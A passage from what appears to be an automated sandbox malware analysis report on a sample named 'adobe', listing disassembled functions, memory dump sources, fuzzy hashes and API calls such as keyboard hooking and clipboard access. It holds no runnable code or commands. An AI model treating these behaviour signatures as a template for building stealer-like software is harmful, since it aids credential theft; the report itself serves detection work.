Instruction Fuzzy Hash: 40618030F002089FEB549FA5C8147AEBBF6EF88700F20852AE506EB395DA759D459F91

Function 0696A318 Relevance: 2.7, Strings: 2, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X!@, xrefs: 0696A38B
x!@, xrefs: 0696A3AC

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: X!@$x!@
API String ID: 0-2527372166
Opcode ID: 3891beffd36bc12276ba506ab2756d4daba2e6c74db229b312ae682f8328debc
Instruction ID: 3406f727ca70479842be90e5b5e31a4ad4b64c059ea2f87da12b1e68a8be14f0
Opcode Fuzzy Hash: 3891beffd36bc12276ba506ab2756d4daba2e6c74db229b312ae682f8328debc
Instruction Fuzzy Hash: 7F81A031F002058FCB54EFA9D9906ADB7B6EF88310F208929E509E7754EB35ED46CB90

Function 069690B9 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 0696910F
$kq, xrefs: 0696914A

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: f229826e91bd272961dc90aeab48f85c235b4aaeb2dfd4d7f353099b529b1bd9
Instruction ID: 11b5f2eaaeb9795fb5e60bd555bc96f6b33d6bb6243cfad2bc943608a00286cf
Opcode Fuzzy Hash: f229826e91bd272961dc90aeab48f85c235b4aaeb2dfd4d7f353099b529b1bd9
Instruction Fuzzy Hash: A2513074B002068FDF54DF75D9507AEB7FAEB88640F208569D809D7398EA35EC128F90

Function 06952E0D Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8df02ac648057878ebf254c3aad55832699131e748dea875251f3dbc6d452378
Instruction ID: 014d6b9090fb6fac17d637cbfc9e52efbc285f8f7939a225bf7db9163f0cf2e1
Opcode Fuzzy Hash: 8df02ac648057878ebf254c3aad55832699131e748dea875251f3dbc6d452378
Instruction Fuzzy Hash: AB51F271C00209AFDF15CFA9D984ADEBFB5FF48310F25812AE818AB260D7719995DF90

Function 012AED30 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.4115357874.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_12a0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9e8068ec5bd708a83220647a59548ad0f378c73b23a560bf4f18b25dc899d0
Instruction ID: a5a891836f67c2e31ddce9f51f29f8e9614ead22956b8b41cc7960d5aed60814
Opcode Fuzzy Hash: 5a9e8068ec5bd708a83220647a59548ad0f378c73b23a560bf4f18b25dc899d0
Instruction Fuzzy Hash: E8412172E0439A8FCB04DFA9D8002DABFF0EF89320F1585AAD544E7251DB349885CBE1

Function 06952E58 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06952F6A

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d2dc8bab7c49cb5267474862904e7c5f0be825185408579c9f3f5c6812b1fa6d
Instruction ID: 5324b315615af810fea4170047f71027ddf6431debe1d5b299a9782b52056c3d
Opcode Fuzzy Hash: d2dc8bab7c49cb5267474862904e7c5f0be825185408579c9f3f5c6812b1fa6d
Instruction Fuzzy Hash: EE41C0B1D003099FDB14CF99D984ADEFBB5BF48310F24852AE819AB210D7719985CF90

Function 06956694 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 069579E9

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5bce8c4c79d62a75537d7f7e077655b25b8fb83c9f3c645568963f40a559a042
Instruction ID: c1174d7feb3beda2e4ea4ed4bb736bd7e1b6c372d0378e449e2d8fb390b7f7f1
Opcode Fuzzy Hash: 5bce8c4c79d62a75537d7f7e077655b25b8fb83c9f3c645568963f40a559a042
Instruction Fuzzy Hash: 254127B4A00305CFDB54CF99C488AAABBF5FB88314F25C859D919AB721D734A941CFA0

Function 0695866C Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06958700

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 78fd75fccf5de71a4299c6bd47cba7618953ce9c817baabedf3dbae0979512cd
Instruction ID: 084d3b35b82ba74967f6c65d04c2bbea874e676b43f199a53a9011552749b893
Opcode Fuzzy Hash: 78fd75fccf5de71a4299c6bd47cba7618953ce9c817baabedf3dbae0979512cd
Instruction Fuzzy Hash: B73103B0E01258DFDB10DF99CA84BDDBBF5AB48304F248059E404BB294DB755845CF95

Function 069580A8 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06958700

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: a8f460699eb1670f66106d9fe8078d1c1f4fee60c9ccbd7d19f3aee85ba151df
Instruction ID: 22adb25345fc5e1509ce0d3c2ad567d83e52dabfae3a7ffaea3e1fd2f7d5f605
Opcode Fuzzy Hash: a8f460699eb1670f66106d9fe8078d1c1f4fee60c9ccbd7d19f3aee85ba151df
Instruction Fuzzy Hash: C13102B0E01218DFDB50CF99CA84B9DBBF5AB48304F208059E404BB294D7B56845CF95

Function 06956A90 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06956B1F

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d45f0378516b4d523d232e4b6bb55405a8f6accac33152796933af62e2413e0f
Instruction ID: c126244746fe1b1b12a7a74c67c0b2f434674002a3d980dfe4743557914a6d1a
Opcode Fuzzy Hash: d45f0378516b4d523d232e4b6bb55405a8f6accac33152796933af62e2413e0f
Instruction Fuzzy Hash: D721E4B5D00349AFDB10DFAAD984ADEBFF8EB48320F14841AE954A3310D775A940CFA5

Function 06956A98 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06956B1F

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 87ceb33b36d8a0d293b9969aa6ff666c8496899bef0e072f1e01f622e5c9e628
Instruction ID: f38159b5a54b6aaa974bd1e79c6c19cf8d976d203ede984263d6be1ba4239dcc
Opcode Fuzzy Hash: 87ceb33b36d8a0d293b9969aa6ff666c8496899bef0e072f1e01f622e5c9e628
Instruction Fuzzy Hash: BF21E2B5D002089FDB10CFAAD984ADEBFF8EB48320F14841AE918A3310D374A940CFA4

Function 0695A2C0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0695A343

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 5fa93542f1671cd10635cfd8bc4d2d2516f0bdbc5230bee50638c0a9ba3e902a
Instruction ID: 52d45400bc6a818de9949d88b708ad135c2bd21bc1654630242860e831db34ba
Opcode Fuzzy Hash: 5fa93542f1671cd10635cfd8bc4d2d2516f0bdbc5230bee50638c0a9ba3e902a
Instruction Fuzzy Hash: B22135B1D00209DFCB14CF99C844BEEFBF8EB88320F24842AE459A7250C774A944CFA4

Function 0695A2C8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0695A343

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 2b71ffdf54d1494ab7de794af80e2e506e18ea4c51761dbae9bf6f431253685c
Instruction ID: f4f3c4f5922933f00f0fb6be0c2df8e0d3fd786e02d33008f07548e0200934b8
Opcode Fuzzy Hash: 2b71ffdf54d1494ab7de794af80e2e506e18ea4c51761dbae9bf6f431253685c
Instruction Fuzzy Hash: EB2124B1D002498FCB54DF9AC844BEEFBF9AB88320F24842AD459A7250C775A944CFA4

Function 012AEE18 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 012AEE7F

Memory Dump Source

Source File: 00000007.00000002.4115357874.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_12a0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 35cfa4a4fa736e6411263446508683213318c738bb1414ab6d14ccbf3a8c9da0
Instruction ID: fa7bbec446b45eacd821df3a4d2ccb531e719db9049f1183951ba41e67c265d7
Opcode Fuzzy Hash: 35cfa4a4fa736e6411263446508683213318c738bb1414ab6d14ccbf3a8c9da0
Instruction Fuzzy Hash: A811F0B1C0066A9BCB10DF9AC544BDEFBF4AF48320F15816AD918A7250D378A944CFE5

Function 0695039C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06951E16

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f791def6ce417d34a5d3c28be5ea02056116816ede6cefe5f3b269621c962c56
Instruction ID: 13588b18573c8d585b92f463557a95e56eb598b68c29799cdadb4a91629215f9
Opcode Fuzzy Hash: f791def6ce417d34a5d3c28be5ea02056116816ede6cefe5f3b269621c962c56
Instruction Fuzzy Hash: DF1132B5C003488FCB10DF9AC444BDEFBF4EB48210F10842AD829B7A00C375A544CFA5

Function 06951DAA Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06951E16

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4ec7fdd0759bc48e1abe66abffb1442c7d9b90a6100f9c797b58e7805c42cb10
Instruction ID: d4abce4f307c55f8bf6ef4b6c3e82606b8b50a2ec295a59679f0776e44c6e243
Opcode Fuzzy Hash: 4ec7fdd0759bc48e1abe66abffb1442c7d9b90a6100f9c797b58e7805c42cb10
Instruction Fuzzy Hash: 521102B5C003498FCB14DF9AD844BDEFBF8EB49220F11846AD869B7610C375A545CFA5

Function 069566EC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06957C35), ref: 06957CBF

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1e99370ca0331c96b5f4705d1c2dcb558d88a7f867c136eccd2ffbdd114902e1
Instruction ID: 86cdbb48a59baead9109080e617eca3a3f3db908894c2319e90c7fb12bb9da67
Opcode Fuzzy Hash: 1e99370ca0331c96b5f4705d1c2dcb558d88a7f867c136eccd2ffbdd114902e1
Instruction Fuzzy Hash: D91133B1800248CFCB10DF9AD484BDEBBF8EB48320F20841AD959A7700C374A944CFA4

Function 06958529 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06958585

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 46cf460726b974ece1fa0283b6881cb0159c96197a20f2b95c022e530d17442f
Instruction ID: 3b5991f8afe42c7b030fdfad8695ab9320173f71b53215d3fed12b550424a8d2
Opcode Fuzzy Hash: 46cf460726b974ece1fa0283b6881cb0159c96197a20f2b95c022e530d17442f
Instruction Fuzzy Hash: D81142B4D00358CFDB20DFAAD548BDEBFF4AB48324F24845AE419A7610C374A980CFA5

Function 06956834 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06958585

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c3108788db344037e99bd5f74b4f1aeddbd09b0297fabe4e89159ad8252182a0
Instruction ID: 04120b1da4f0d6e7a89eab681cebfa56212eaf6347053ff1981522758232859b
Opcode Fuzzy Hash: c3108788db344037e99bd5f74b4f1aeddbd09b0297fabe4e89159ad8252182a0
Instruction Fuzzy Hash: 161145B18003588FDB20DF9AD544BDEBBF4EB48320F20845AD519B7610C378A940CFA5

Function 06957C58 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06957C35), ref: 06957CBF

Memory Dump Source

Source File: 00000007.00000002.4146750928.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6950000_adobe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 15c39eda28798b0ab79aa57bd5f3683f90c2c165de070193dd9942ece6b1fd6f
Instruction ID: 1b6abc4eb7b262ddd51aced22c95705c163617acc8582ef02a1a9cbb7251de22
Opcode Fuzzy Hash: 15c39eda28798b0ab79aa57bd5f3683f90c2c165de070193dd9942ece6b1fd6f
Instruction Fuzzy Hash: 271103B58002498FCB10DF9AD844BDEBBF8AB49324F20841AD559BB750C775A544CFA5

Function 06964B09 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

XPpq, xrefs: 06964C45

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: XPpq
API String ID: 0-1266478781
Opcode ID: bc7848ab049a9601cfe1e750837b93b37fdce09abecb1c4a10d9e6009b56a7dd
Instruction ID: 71fafe22bdda4fdcddbe5d6e0bc278a71c430abaffe1e414834467ff369febf7
Opcode Fuzzy Hash: bc7848ab049a9601cfe1e750837b93b37fdce09abecb1c4a10d9e6009b56a7dd
Instruction Fuzzy Hash: 0F417F30F002089FDB54DFA5C854BAEBBF6EF88700F208529E506AB3A5DA749C45DF90

Function 0696DA3D Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

PHkq, xrefs: 0696DB99

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 901de2f787e4773682277a8993e139016dc7de612aebe9909b5cea36a8800445
Instruction ID: 8201618a93cee5966b6a99968b5668298bb7ddfe9daeaf2a9b5321a069f2e525
Opcode Fuzzy Hash: 901de2f787e4773682277a8993e139016dc7de612aebe9909b5cea36a8800445
Instruction Fuzzy Hash: 3541AF30F003099FDB61DF66C58469EBBB6AF85340F204929E412EB644DB74D94ACB80

Function 069621C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHkq, xrefs: 06962303

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: addeb751e3bec7a849a2359ffd3cb80f462d3dc22dd7726667b17e08a2cee6ed
Instruction ID: 694e4b2df9cfcb989cb757df7f0027a790fe1ac0d8975b23718dfb504202923f
Opcode Fuzzy Hash: addeb751e3bec7a849a2359ffd3cb80f462d3dc22dd7726667b17e08a2cee6ed
Instruction Fuzzy Hash: 0A31E330B002058FDF59AB75D95476F7BAAAF89200F208538E406DB399DF35DD46CBA1

Function 0696FEE9 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

|, xrefs: 0696FF48

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: d90ab82afbc34f56d030b85602a85e2ae7a0973a8cce2fb2d56c058282a5b1dc
Instruction ID: 209270d589639c7a2240c7a80b6b344774c69c2fbb9c42b94ac167ce76e001a0
Opcode Fuzzy Hash: d90ab82afbc34f56d030b85602a85e2ae7a0973a8cce2fb2d56c058282a5b1dc
Instruction Fuzzy Hash: 69115971B102149FDB54DF78D805B6EB7F6AF88740F10846AE94AD73A4EB35A900CB94

Function 0696FEF8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 0696FF48

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 6067a6f6c51de135fef5121a78bf88729993e0e86b5fa395821258a027ab1d03
Instruction ID: 854c66a60bcdcf7001d3023bf62bf645e1bc8019ae046bde8d0ba86a7edbaa9f
Opcode Fuzzy Hash: 6067a6f6c51de135fef5121a78bf88729993e0e86b5fa395821258a027ab1d03
Instruction Fuzzy Hash: 24114971B002149FDB44AF78D804B6EB7F6AF48700F10846AE50AE73A4DB359D00CB94

Function 0696FB27 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902a3766b11a38565e71bf079046e2ec1e6f19eb9505e61592a098067ec580e2
Instruction ID: 7b26d3a15a7d55554a558577ffa2cc16de5826bff27e6d4ee0c5770ea8d980fe
Opcode Fuzzy Hash: 902a3766b11a38565e71bf079046e2ec1e6f19eb9505e61592a098067ec580e2
Instruction Fuzzy Hash: C171D331F00205DFDF64ABB9E9643AEB7ABEB84310F20482AE50AD7754DB359C45C790

Function 06966158 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd618522068fc177e9af97c17c3dff7de69ceb7bbd007b5ebf08077d725b78f0
Instruction ID: 620acb9711407aed33d692fb18d77ff0641c8c60d8002a8e168168d9fa909530
Opcode Fuzzy Hash: bd618522068fc177e9af97c17c3dff7de69ceb7bbd007b5ebf08077d725b78f0
Instruction Fuzzy Hash: B061D3B2F002114FDF559A7EC88066EBAEBAFC4610B254439F80ADB379DE65DD0287C1

Function 06964252 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0437bfa78ec2135dbac4b5abeecac3b39a6d51619d818d85afe19f659984a1c1
Instruction ID: be179c901e7f0b0388b8dcee8219073b90d80b1b7c1a1d2e887df0c9ce06318d
Opcode Fuzzy Hash: 0437bfa78ec2135dbac4b5abeecac3b39a6d51619d818d85afe19f659984a1c1
Instruction Fuzzy Hash: 5A813B30B006098FDF54DFA9D5547AEB7F6AF89700F208529E40ADB398EB74DC428B91

Function 0696456C Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762d82c910055be89b9c36c1541537b69982042d7db9a9b9b6a7d4cc8e9a2e8c
Instruction ID: 9b7bab56362987d3b6726e3de1ea57f870a37c8d718ac32fe90c2ac6fb4ab114
Opcode Fuzzy Hash: 762d82c910055be89b9c36c1541537b69982042d7db9a9b9b6a7d4cc8e9a2e8c
Instruction Fuzzy Hash: E9914E30E106198FDF60DFA9C890B9DB7B1FF89300F208599E549AB255DB70AE85CF90

Function 06964580 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e38bf9ff7cf45d7c2b800032dc78742c91efd1769d50607bce83bbe6c314b9f
Instruction ID: c76892a32f918fc671913ea5a7b6cb53872fc5fdd0838c4033a3b938037b3e8d
Opcode Fuzzy Hash: 2e38bf9ff7cf45d7c2b800032dc78742c91efd1769d50607bce83bbe6c314b9f
Instruction Fuzzy Hash: 2A913C34E106198BDF60DFA9C890B9DB7B1FF89300F20C599E549AB255DB70AA85CF90

Function 0696EE98 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f077f6b3ecc96647e357a969a83cc13fce18f92252c08c01e30bf7818bc8278e
Instruction ID: 1217f7960dbcf2017ad9c2592fbe3727e1cc5745e648f9a32c5db4325594172a
Opcode Fuzzy Hash: f077f6b3ecc96647e357a969a83cc13fce18f92252c08c01e30bf7818bc8278e
Instruction Fuzzy Hash: 81712971A002099FDB54DFA9D980AAEBBF6FF88300F258529E405EB755DB30ED46CB50

Function 0696EEA8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e0122bde5f1696dede15688247f5a0f5319b570bfb4a8dac5c51f70fc65632
Instruction ID: 01e1d7e87c01df5db108811d8bf92acffb29cb723d1e7b6db634eed44a7468f8
Opcode Fuzzy Hash: a7e0122bde5f1696dede15688247f5a0f5319b570bfb4a8dac5c51f70fc65632
Instruction Fuzzy Hash: 33713971A002099FDB54DFA9D980AAEBBF6FF88300F258429E405EB755DB30ED46CB50

Function 0696F8D9 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814452efc34e4d64c09dce42180b64737aea62f311961659a96b8b261647c731
Instruction ID: d0577b790e41e4476cdaee79dff84f77e3ab55440678ec4b9e067c5daa666b20
Opcode Fuzzy Hash: 814452efc34e4d64c09dce42180b64737aea62f311961659a96b8b261647c731
Instruction Fuzzy Hash: DE51B530B103049FEFA4AB6DE95472F265FD789350F30482AF10AD3BA9DA39CC854391

Function 0696F8E8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7ce43b0499bbe56fd00261379e5168b568aa48549ad6fb735674d4dd32ba5c0
Instruction ID: 1a177338b86f819ce0a490dd97568fb12fdbf6d69faa773a6078b595b62a036a
Opcode Fuzzy Hash: d7ce43b0499bbe56fd00261379e5168b568aa48549ad6fb735674d4dd32ba5c0
Instruction Fuzzy Hash: C951B630B103149FEFA46A6DE95472F365FD789350F30482AF10AD37A8DA39CC8543A2

Function 069653C0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfe7f9feb4d688ad2202ba1bf114d9cf9d9bcd27cbbd5eee9a4c95b89da58ba
Instruction ID: 5e726d080ca089adb47612f53f9d23b9363e8f0591720fb67436acba097b162a
Opcode Fuzzy Hash: 5bfe7f9feb4d688ad2202ba1bf114d9cf9d9bcd27cbbd5eee9a4c95b89da58ba
Instruction Fuzzy Hash: 16415E71E007058FDB70CFAAD880AAFFBB6FB84310F21492AE156D7A50D770E9558B91

Function 06962078 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

